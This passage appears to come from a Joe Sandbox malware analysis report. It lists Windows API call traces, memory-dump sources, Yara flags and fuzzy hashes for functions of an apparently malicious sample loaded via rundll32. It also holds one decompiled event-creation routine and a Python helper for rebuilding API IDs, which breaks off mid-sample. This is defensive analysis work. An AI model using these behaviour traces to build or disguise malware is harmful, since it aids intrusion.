                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,0627AE46,00000000,00000000), ref: 06291C3D
                                                          • GetLastError.KERNEL32(?,?,?,0627AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,0627EBC1,?,0000001E), ref: 06291C45
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide
                                                          • String ID:
                                                          • API String ID: 203985260-0
                                                          • Opcode ID: befd4a2ad3f444c49aac2c099ef2cf91d2eb30c87e003b86f0e290e5c47210fd
                                                          • Instruction ID: 800533d5d1c6455755e83a1f68e93210c7799634c028c114c5922c62cb8d745c
                                                          • Opcode Fuzzy Hash: befd4a2ad3f444c49aac2c099ef2cf91d2eb30c87e003b86f0e290e5c47210fd
                                                          • Instruction Fuzzy Hash: 7B01FC316183527F9B71AA739C4CD6BBB6DEBCA770B100B29FD65921C0D7304810C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,06271D09,?,?,?,?,?,?,?,?,?), ref: 062727F4
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • mbstowcs.NTDLL ref: 0627280E
                                                          • lstrlen.KERNEL32(?), ref: 06272819
                                                          • mbstowcs.NTDLL ref: 06272833
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BB71
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?), ref: 0628BBCC
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BBEF
                                                            • Part of subcall function 0628BAD1: wcscpy.NTDLL ref: 0628BC01
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                                          • String ID:
                                                          • API String ID: 1961997177-0
                                                          • Opcode ID: ddb5c1a3f46c44c602aefd7d5de734081cfd467e92ce7e25ef1bdee260a1ea77
                                                          • Instruction ID: dfe77bba25399b34edfd85f9c0d58c560c8e76a6ec9020442245a1779eafcdfa
                                                          • Opcode Fuzzy Hash: ddb5c1a3f46c44c602aefd7d5de734081cfd467e92ce7e25ef1bdee260a1ea77
                                                          • Instruction Fuzzy Hash: 5901F173911314BBEF91BBA58C88F8F7BADEF84250F144029FD14A6140EA71DA00C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?), ref: 06271B7E
                                                          • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 06271BA4
                                                          • lstrcpy.KERNEL32(00000014,?), ref: 06271BC9
                                                          • memcpy.NTDLL(?,?,?), ref: 06271BD6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1388643974-0
                                                          • Opcode ID: ec0e107928db07b6a6a39919dfbe1ad5a0d233ab48733bb407ed7c35213ca1a2
                                                          • Instruction ID: 6f86e8a2fbab8c72acd9acd6e708def0705a9fe67eb25fc3138301f8cb8f864b
                                                          • Opcode Fuzzy Hash: ec0e107928db07b6a6a39919dfbe1ad5a0d233ab48733bb407ed7c35213ca1a2
                                                          • Instruction Fuzzy Hash: 2D11377191030AEFC721CF58E848E9ABBF9EF49704F14855AF95997210D771E914CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,06280D10,?,00000000,00000000), ref: 0628E04E
                                                          • lstrlen.KERNEL32(0689C178,?,06280D10,?,00000000,00000000), ref: 0628E06F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0628E087
                                                          • lstrcpy.KERNEL32(00000000,0689C178), ref: 0628E099
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 1929783139-0
                                                          • Opcode ID: dfe196441ef800c98f93bd20d30e0ebb958d58c7a970e6ed62b87351c9ab585b
                                                          • Instruction ID: 44d55736c97cfc0a5333d6e6460a1eab2570fa99aabb01a574e2603fadecca38
                                                          • Opcode Fuzzy Hash: dfe196441ef800c98f93bd20d30e0ebb958d58c7a970e6ed62b87351c9ab585b
                                                          • Instruction Fuzzy Hash: A401C876A00345EFC751ABA8EC48E5FBBFDAB88205F050465EE4AE3241DA30D508CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,0627B697,00000000,?,?,?,76CDF710,00000000,00000000), ref: 06289E17
                                                          • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 06289E2F
                                                          • memcpy.NTDLL(0000000C,?,00000001), ref: 06289E45
                                                            • Part of subcall function 0627A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,0689C304,00000000,?,06276584,?), ref: 0627A90E
                                                            • Part of subcall function 0627A8E9: StrTrimA.SHLWAPI(00000020,06295FCC,00000000,?,06276584,?), ref: 0627A92D
                                                            • Part of subcall function 0627A8E9: StrChrA.SHLWAPI(00000020,?,?,06276584,?), ref: 0627A939
                                                          • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 06289E77
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3208927540-0
                                                          • Opcode ID: 1a3d2f3c2fbff560f36d27274cd53b531fdc8378ffd482f738dd469b516352e3
                                                          • Instruction ID: 8612e77c9e3ab7b11b807d322129b1b3a2f3317ce13e2e13a62f69befaf27f00
                                                          • Opcode Fuzzy Hash: 1a3d2f3c2fbff560f36d27274cd53b531fdc8378ffd482f738dd469b516352e3
                                                          • Instruction Fuzzy Hash: A2018831A11702AFE3615F56EC49F3B7F99FBC4751F044426FB19A5080D7B19849DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • RtlInitializeCriticalSection.NTDLL(0629A400), ref: 06285285
                                                          • RtlInitializeCriticalSection.NTDLL(0629A3E0), ref: 0628529B
                                                          • GetVersion.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852AC
                                                          • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852E0
                                                            • Part of subcall function 062868AC: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,062852C3), ref: 062868C4
                                                            • Part of subcall function 062868AC: LoadLibraryA.KERNEL32(?), ref: 06286965
                                                            • Part of subcall function 062868AC: FreeLibrary.KERNEL32(00000000), ref: 06286970
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                                          • String ID:
                                                          • API String ID: 1711133254-0
                                                          • Opcode ID: c4afab7d67266bcd7ee3851107bea8ae802acfe3c21775feb1f140e374ef7ca8
                                                          • Instruction ID: f5a6dcb8469e3e26c62d450495a343a39805a2ea4d57236acdcdcaeaefbe7ced
                                                          • Opcode Fuzzy Hash: c4afab7d67266bcd7ee3851107bea8ae802acfe3c21775feb1f140e374ef7ca8
                                                          • Instruction Fuzzy Hash: DE118071E613109FEB90AFB9BC8C68537A6F7CA214700053AEB15D7240D7B84884CFB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 0627253B
                                                          • Sleep.KERNEL32(0000000A), ref: 06272545
                                                          • SetEvent.KERNEL32 ref: 0627259C
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 062725BB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterEventLeaveSleep
                                                          • String ID:
                                                          • API String ID: 1925615494-0
                                                          • Opcode ID: f7b772cd0c2e23f71910703553d56c54250e1a041b1caafd9a2a1be69a9a102d
                                                          • Instruction ID: a997cef08ae76dbd385630129caac4899afd9975e49c668ae4aadc1149af8648
                                                          • Opcode Fuzzy Hash: f7b772cd0c2e23f71910703553d56c54250e1a041b1caafd9a2a1be69a9a102d
                                                          • Instruction Fuzzy Hash: 52019670A61305EBDB41AB61FC5DF5A3AADEB84755F004011EB06E6180D6749604CFB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06290DDD: lstrlen.KERNEL32(?,?,00000000,06277BEE), ref: 06290DE2
                                                            • Part of subcall function 06290DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 06290DF7
                                                            • Part of subcall function 06290DDD: wsprintfA.USER32 ref: 06290E13
                                                            • Part of subcall function 06290DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 06290E2F
                                                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 06277C06
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 06277C15
                                                          • CloseHandle.KERNEL32(00000000), ref: 06277C1F
                                                          • GetLastError.KERNEL32 ref: 06277C27
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4042893638-0
                                                          • Opcode ID: 444c99997e391c1153692d3a640cc39ac0917173b63afe46bf80f3028f4f703b
                                                          • Instruction ID: 0bfa9af15566883e98c6017f83fcf579c4d86e4c1b9d084d618c6432c87d08d7
                                                          • Opcode Fuzzy Hash: 444c99997e391c1153692d3a640cc39ac0917173b63afe46bf80f3028f4f703b
                                                          • Instruction Fuzzy Hash: AFF0D171611314BADBA12A65EC8DF9B7E6DEF89AA6F104129FA09A50C0C6704550CAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 06284A5D
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
                                                            • Part of subcall function 0627F39B: GetLastError.KERNEL32 ref: 0627F3E5
                                                            • Part of subcall function 0627F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
                                                            • Part of subcall function 0627F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
                                                            • Part of subcall function 0627F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
                                                            • Part of subcall function 0627F39B: SetEndOfFile.KERNEL32(00001000), ref: 0627F477
                                                            • Part of subcall function 0627F39B: CloseHandle.KERNEL32(00001000), ref: 0627F48F
                                                          • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0627E4AF,?,?,00001000,?,?,00001000), ref: 06284A80
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0627E4AF,?,?,00001000,?,?,00001000), ref: 06284AA2
                                                          • GetLastError.KERNEL32(?,0627E4AF,?,?,00001000,?,?,00001000), ref: 06284AB6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                          • String ID:
                                                          • API String ID: 3370347312-0
                                                          • Opcode ID: a56c3d189caa8fe0e7063fb8d03ca9ddbc1fc13998c9ff94641895fe03451631
                                                          • Instruction ID: cb5a8bf31f2113c8ba77d0c929f491458d80e555c5eedd8e83bfa2ebb9be7c20
                                                          • Opcode Fuzzy Hash: a56c3d189caa8fe0e7063fb8d03ca9ddbc1fc13998c9ff94641895fe03451631
                                                          • Instruction Fuzzy Hash: 27F0A431215306BFEB526E60AC1DF5A3A56AF45310F100124FF06A80D0E7715161CBBA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedExchange.KERNEL32(0629A060,00000000), ref: 06278906
                                                          • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 06278921
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0627894A
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0627896B
                                                            • Part of subcall function 0627DC41: SetEvent.KERNEL32(00000000,?,0628507B), ref: 0627DC56
                                                            • Part of subcall function 0627DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0628507B), ref: 0627DC76
                                                            • Part of subcall function 0627DC41: CloseHandle.KERNEL32(00000000,?,0628507B), ref: 0627DC7F
                                                            • Part of subcall function 0627DC41: CloseHandle.KERNEL32(00000000,?,?,0628507B), ref: 0627DC89
                                                            • Part of subcall function 0627DC41: RtlEnterCriticalSection.NTDLL(?), ref: 0627DC91
                                                            • Part of subcall function 0627DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 0627DCA9
                                                            • Part of subcall function 0627DC41: CloseHandle.KERNEL32(00000000), ref: 0627DCC5
                                                            • Part of subcall function 0627DC41: LocalFree.KERNEL32(?), ref: 0627DCD0
                                                            • Part of subcall function 0627DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 0627DCDA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                                          • String ID:
                                                          • API String ID: 1103286547-0
                                                          • Opcode ID: 4d806d9f8313037ed5ee2e366f0f44055f692dfda3f60595c370b112a3ac7009
                                                          • Instruction ID: 4e5c14e5d7cbf5bb745c846453735c518373b4ea3e8140e98be748114fd492ff
                                                          • Opcode Fuzzy Hash: 4d806d9f8313037ed5ee2e366f0f44055f692dfda3f60595c370b112a3ac7009
                                                          • Instruction Fuzzy Hash: 9FF0AF32750321ABCBA12A26BC0EF463A1AEFC4B65F040424BF09AA280D9759805CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D227F(void* __esi) {
                                                          				// __esi points at a 0x38-byte context block. The routine zeroes it and
                                                          				// stores two manual-reset events in it: +0x1c starts non-signaled,
                                                          				// +0x20 starts signaled. _v4 is the BOOL result (1 = both events created);
                                                          				// the _SECURITY_ATTRIBUTES* type is a decompiler guess.
                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          
                                                          				_v4 = 0;
                                                          				memset(__esi, 0, 0x38);
                                                          				_t8 = CreateEventA(0, 1, 0, 0);            // manual-reset, initially non-signaled
                                                          				*(__esi + 0x1c) = _t8;
                                                          				if(_t8 != 0) {
                                                          					_t10 = CreateEventA(0, 1, 1, 0);       // manual-reset, initially signaled
                                                          					*(__esi + 0x20) = _t10;
                                                          					if(_t10 == 0) {
                                                          						CloseHandle( *(__esi + 0x1c));     // second event failed: release the first, return 0
                                                          					} else {
                                                          						_v4 = 1;
                                                          					}
                                                          				}
                                                          				return _v4;
                                                          			}

                                                          Statement addresses, in listing order: 0x036d2289, 0x036d228d, 0x036d22a2, 0x036d22a4, 0x036d22a9, 0x036d22af, 0x036d22b1, 0x036d22b6, 0x036d22c1, 0x036d22b8, 0x036d22b8, 0x036d22b8, 0x036d22b6, 0x036d22cf

                                                          APIs
                                                          • memset.NTDLL ref: 036D228D
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76CC81D0,00000000,00000000), ref: 036D22A2
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 036D22AF
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D22C1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 6d97645fae3de65cfb56f7b5c51ad03e2b43d017ab3fef4c473ec37672dbaa03
                                                          • Instruction ID: 4f54fea6dd435b949065fad0acc569494c24f57aa8ebb50fa503272bf4363099
                                                          • Opcode Fuzzy Hash: 6d97645fae3de65cfb56f7b5c51ad03e2b43d017ab3fef4c473ec37672dbaa03
                                                          • Instruction Fuzzy Hash: 99F054B150530C7FD310AF61ECC4C27FBDCEB461A8B114D2DF14292515C671A8158A70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0628D601
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0627DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628D616
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,06273EC6,?,?), ref: 0628D623
                                                          • CloseHandle.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628D635
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 2edee5cc2fa5f92b07766b114faa98bf22cf32f174d9163d13bbf23fa59e8735
                                                          • Instruction ID: 66e8bd4e5281cc1b5b377ebb3821555d74bd956bbf0f643b68650abb45225819
                                                          • Opcode Fuzzy Hash: 2edee5cc2fa5f92b07766b114faa98bf22cf32f174d9163d13bbf23fa59e8735
                                                          • Instruction Fuzzy Hash: 38F0BEB151131D7FD3206F26ECC4C27BBECEF86298B154D2EF14682180C671A808CEB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,06274BD6,000000FF,0689B7F0,?,?,0628B7F2,0000003A,0689B7F0), ref: 06284AE0
                                                          • GetLastError.KERNEL32(?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008), ref: 06284AEB
                                                          • WaitNamedPipeA.KERNEL32(00002710), ref: 06284B0D
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C), ref: 06284B1B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                                          • String ID:
                                                          • API String ID: 4211439915-0
                                                          • Opcode ID: a0552cdd03a0045294c97e22805ef8873dff80e02ff920a9f4b266656733da20
                                                          • Instruction ID: 32bb937de46c398d5c31ffc8c180ec61a79c86f3c76a42db69fe0bf817bb8980
                                                          • Opcode Fuzzy Hash: a0552cdd03a0045294c97e22805ef8873dff80e02ff920a9f4b266656733da20
                                                          • Instruction Fuzzy Hash: 98F06231E12322AFE7613A65BC4DB5A7A96DF85369F154226FF09A61D0C6600840CAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000,06277BEE), ref: 06290DE2
                                                          • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 06290DF7
                                                          • wsprintfA.USER32 ref: 06290E13
                                                            • Part of subcall function 0628C01F: memset.NTDLL ref: 0628C034
                                                            • Part of subcall function 0628C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0628C06D
                                                            • Part of subcall function 0628C01F: wcstombs.NTDLL ref: 0628C077
                                                            • Part of subcall function 0628C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0628C0A8
                                                            • Part of subcall function 0628C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0D4
                                                            • Part of subcall function 0628C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0628C0EA
                                                            • Part of subcall function 0628C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0FE
                                                            • Part of subcall function 0628C01F: CloseHandle.KERNEL32(?), ref: 0628C131
                                                            • Part of subcall function 0628C01F: CloseHandle.KERNEL32(?), ref: 0628C136
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 06290E2F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                                          • String ID:
                                                          • API String ID: 1624158581-0
                                                          • Opcode ID: 324e10731e34b4f950f494ac2011ea7a62971fbfab5218edae02ad5697d1aff7
                                                          • Instruction ID: 4f2d23e8a80367208e2236b8c2977cac1396492d592b3d20d98da9d24425cc66
                                                          • Opcode Fuzzy Hash: 324e10731e34b4f950f494ac2011ea7a62971fbfab5218edae02ad5697d1aff7
                                                          • Instruction Fuzzy Hash: B0F0BE32601210BBC7211B2ABC0DF5B7BAEEBC6B65F090125FB05E6291D6208849CEB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 06276540
                                                          • Sleep.KERNEL32(0000000A), ref: 0627654A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06276572
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06276590
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: b28972aca767e216d9f7d9aac33a7c41d58b44083b8d6958abd296f1c5f395c5
                                                          • Instruction ID: 8b6a683b9a9d932027a92d0d6a2333bcf2b2b15cf34a00fb3c66f9635e2f0f4a
                                                          • Opcode Fuzzy Hash: b28972aca767e216d9f7d9aac33a7c41d58b44083b8d6958abd296f1c5f395c5
                                                          • Instruction Fuzzy Hash: DBF05E70610342DFE7619B29FC4DF1A3BA6AF84344F048414FA06EA152D730E844DF39
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
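The "API ID" under each function's Similarity entry is the key the report uses to bucket functions with the same API usage, and it can be rebuilt from the "APIs" list printed above it. The following Python is an added example and not Joe Sandbox's own code: it parses "APIs" blocks copied from this page (keeping the "Part of subcall function" lines, which the report counts), strips the A/W suffix, splits each name into words and rebuilds the ID. The grouping rule it applies is inferred from the entries on this page, not from vendor documentation: words sorted by how often they occur, "$" between frequency groups, ASCII order inside a group (uppercase before lowercase), and words of three letters or fewer (Rtl, Get, Set, For, Of, End) dropped. The numeric "API String ID" is a hash whose function the page does not show and is not reproduced. token_overlap is my own addition for a softer comparison than exact ID equality.

```python
import re
from collections import Counter

# Constructed sample input: four "APIs" blocks copied from this report (the init
# routine at 06285285, the named-pipe client at 06284AE0, the lock/free loop at
# 06276540 and the lock/event loop at 0627253B), exactly as the page prints them.
SAMPLE_BLOCKS = {
    "06285285": """
• Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
• RtlInitializeCriticalSection.NTDLL(0629A400), ref: 06285285
• RtlInitializeCriticalSection.NTDLL(0629A3E0), ref: 0628529B
• GetVersion.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852AC
• GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852E0
• Part of subcall function 062868AC: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,062852C3), ref: 062868C4
• Part of subcall function 062868AC: LoadLibraryA.KERNEL32(?), ref: 06286965
• Part of subcall function 062868AC: FreeLibrary.KERNEL32(00000000), ref: 06286970
""",
    "06284AE0": """
• CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,06274BD6,000000FF,0689B7F0,?,?,0628B7F2,0000003A,0689B7F0), ref: 06284AE0
• GetLastError.KERNEL32(?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008), ref: 06284AEB
• WaitNamedPipeA.KERNEL32(00002710), ref: 06284B0D
• WaitForSingleObject.KERNEL32(00000000,?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C), ref: 06284B1B
""",
    "06276540": """
• RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 06276540
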